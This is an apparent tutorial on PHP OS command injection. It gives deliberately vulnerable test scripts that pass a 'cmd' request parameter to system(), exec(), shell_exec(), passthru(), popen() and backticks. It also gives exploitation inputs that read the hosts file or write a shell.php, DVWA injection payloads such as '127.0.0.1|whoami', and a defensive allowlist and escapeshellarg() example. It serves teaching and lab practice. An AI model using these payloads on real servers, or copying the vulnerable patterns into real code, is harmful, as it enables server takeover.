OS Command Injection
Principle and cause:
Scripting languages such as PHP make application development fast, concise and convenient, but they also have drawbacks: they are comparatively slow and cannot reach the lower layers of the system directly. Applications, especially enterprise-level ones, therefore often need to call external programs (system commands or other executables), and they do so through the language's command execution functions. When such a function is called and user input is spliced into the command line as an argument of the system command without being filtered, the result is a command execution (command injection) vulnerability. Two conditions are needed:
1. User input is spliced into the command
2. The input is not sufficiently filtered
Vulnerability hazard
1. Execute system commands with the privileges of the Web server process (the Web user)
2. Read and write files with the Web server's privileges
3. Reverse shell (the server actively connects back to the attacker)
4. Control the entire Web site
5. Control the whole server
Related functions
- system()
system() executes the string as an OS command and prints the output itself.
The test code (system.php) is as follows, in three variants:
```php
<!-- system.php -->
<meta charset='gb2312'>

<!-- 1: fixed command -->
<?php
$str = "ipconfig";
system($str);
?>

<!-- 2: command taken from the request -->
<?php
if (!empty($_GET['cmd'])) {
    $str = $_GET['cmd'];
    system($str);
}
?>

<!-- 3: same, wrapped in <pre> for readable output, with a usage hint -->
<?php
if (isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
} else {
    echo "?cmd=ipconfig";
}
?>
```
- exec()
exec() executes the string as an OS command but does not print anything itself; it returns the last line of the output, so the caller has to print the result.
The test code is as follows:
```php
<!-- exec.php -->
<meta charset="gb2312">
<?php
if (isset($_GET['cmd'])) {
    echo "<pre>";
    // exec() returns only the last line of output, so it is printed explicitly
    print exec($_GET['cmd']);
} else {
    echo "?cmd=whoami";
}
?>
```
- shell_exec()
shell_exec() executes the string as an OS command and returns the complete output as a string.
The test code is as follows:
```php
<!-- shell_exec.php -->
<?php
if (isset($_GET['cmd'])) {
    // shell_exec() returns the whole output, which is printed here
    print shell_exec($_GET['cmd']);
} else {
    echo "?cmd=whoami";
    # cmd=systeminfo / net user add
}
?>
```
- passthru(): executes an OS command and writes its raw output directly to the response.
The test code is as follows:
```php
<!-- passthru.php -->
<?php
if (isset($_GET['cmd'])) {
    // passthru() streams the command output straight to the client
    passthru($_GET['cmd']);
} else {
    echo "?cmd=whoami";
    # cmd=systeminfo / net user add
}
?>
```
- popen(): executes an OS command but does not return the command's result; it returns a file pointer (a pipe to the process).
The test code is as follows:
```php
<!-- popen.php -->
<?php
if (isset($_GET['cmd'])) {
    // the output is redirected to a file, because popen() only returns a pipe handle
    $cmd = $_GET['cmd'] . ">>1.txt";
    $fp = popen($cmd, 'r');
    pclose($fp);
} else {
    echo "?cmd=whoami";
    # cmd=systeminfo / net user add
}
?>
```
Then view the file 1.txt.
- Backticks ` (on a Mac keyboard, typed with Option+1 on the left)
A string enclosed in backticks `` is also executed as an OS command (the backtick operator behaves like shell_exec()).
The test code is as follows:
```php
<!-- `.php -->
<?php
if (isset($_GET['cmd'])) {
    $cmd = $_GET['cmd'];
    // the backtick operator runs the string as a shell command and returns its output
    print `$cmd`;
} else {
    echo "?cmd=whoami";
    # cmd=systeminfo / net user add
}
?>
```
Vulnerability exploitation
An OS command injection vulnerability is particularly harmful because the attacker directly inherits the Web user's privileges and executes arbitrary commands on the server. The following commands were tested successfully on a Windows system.
- View system files: submit the parameter [?cmd=type c:\windows\system32\drivers\etc\hosts] to display the system hosts file.
- Show the current path: submit the parameter [?cmd=cd].
- Write a file: submit the parameter [?cmd=echo"<?php phpinfo();?>" > D:\xampp\htdocs\Commandi\shell.php]. If the page shows no error, the file was written successfully; then access shell.php.
Defense methods
- Minimize the use of command execution functions, and disable them in php.ini via disable_functions
- Filter parameters before they enter a function or method that executes commands
- Wrap parameter values in quotes whenever possible, and escape them by calling addslashes before splicing them into the command
Practice
Security is an issue that needs to be considered in all respects
DVWA Command Injection (code audit)
Payloads that succeed at each security level:
low
```text
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.1&&whoami
127.0.0.1;whoami
127.0.0.0.1||whoami
```
medium
```text
127.0.0.1| whoami
127.0.0.1|whoami
127.0.0.0.1||whoami
```
high
```text
127.0.0.1|whoami
```
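The following is an added example, not code from the original page or from DVWA, that applies the defense methods listed above to a "ping a host" feature and audits it against the payloads in the DVWA list. It uses escapeshellarg() rather than addslashes() for the quoting step, because addslashes() only escapes quotes and backslashes and leaves shell metacharacters such as |, ; and && untouched. The blacklist filter is a constructed, simplified stand-in for a medium-level filter (assumed here: it strips only && and ;), the sample inputs are the payloads from the list plus one legitimate address, and the function names are this example's own.

```php
<?php
// Added example (not from the original page or DVWA): hardening a
// "ping a host" feature against the payloads listed above.
//
// Defense 1 belongs in php.ini (assumed value; keep only what the app needs):
//   disable_functions = system,exec,shell_exec,passthru,popen,proc_open

// Constructed test inputs: the DVWA payloads from the list plus one valid address.
const SAMPLE_INPUTS = [
    '127.0.0.1',
    '127.0.0.1| whoami',
    '127.0.0.1|whoami',
    '127.0.0.1&&whoami',
    '127.0.0.1;whoami',
    '127.0.0.0.1||whoami',
];

// Blacklist filter (assumed, simplified): strips "&&" and ";" and nothing else.
// Shown only to make the gap visible: "|" and "||" pass straight through.
function blacklist_filter(string $input): string
{
    return str_replace(['&&', ';'], '', $input);
}

// Defense 2: allowlist validation. Accept only a syntactically valid IP
// address; anything else is refused instead of "cleaned".
function is_valid_ip(string $input): bool
{
    return filter_var($input, FILTER_VALIDATE_IP) !== false;
}

// Defense 3: build the command only from a validated value, and quote it with
// escapeshellarg() so the shell never interprets metacharacters inside it.
function build_ping_command(string $target): ?string
{
    if (!is_valid_ip($target)) {
        return null; // refuse the request rather than try to repair the input
    }
    $base = stripos(PHP_OS, 'WIN') === 0 ? 'ping' : 'ping -c 4';
    return $base . ' ' . escapeshellarg($target);
}

// Audit table: for each input, what the blacklist would pass on to the shell
// versus what the allowlist version does with it.
function audit(array $inputs): array
{
    $rows = [];
    foreach ($inputs as $input) {
        $rows[] = [
            'input'     => $input,
            'blacklist' => blacklist_filter($input),
            'allowlist' => is_valid_ip($input) ? 'accepted' : 'rejected',
            'command'   => build_ping_command($input) ?? '(none, request refused)',
        ];
    }
    return $rows;
}

foreach (audit(SAMPLE_INPUTS) as $row) {
    printf("%-22s | blacklist passes: %-20s | allowlist: %-8s | %s\n",
        $row['input'], $row['blacklist'], $row['allowlist'], $row['command']);
}
```

Run it with `php` from the command line: the blacklist column shows that only the && and ; payloads are altered (and merely collapsed to `127.0.0.1whoami`, not rejected), while every |-based payload reaches the shell unchanged, which matches the medium-level list above. The allowlist column rejects all five payloads, including `127.0.0.0.1||whoami`, because that is not a valid address, and only the legitimate input produces a command. Treat the allowlist as the primary control and escapeshellarg() as a second layer: on Windows, escapeshellarg() wraps the value in double quotes and replaces % and ! with spaces, so it does not by itself guarantee the value is used safely by every program.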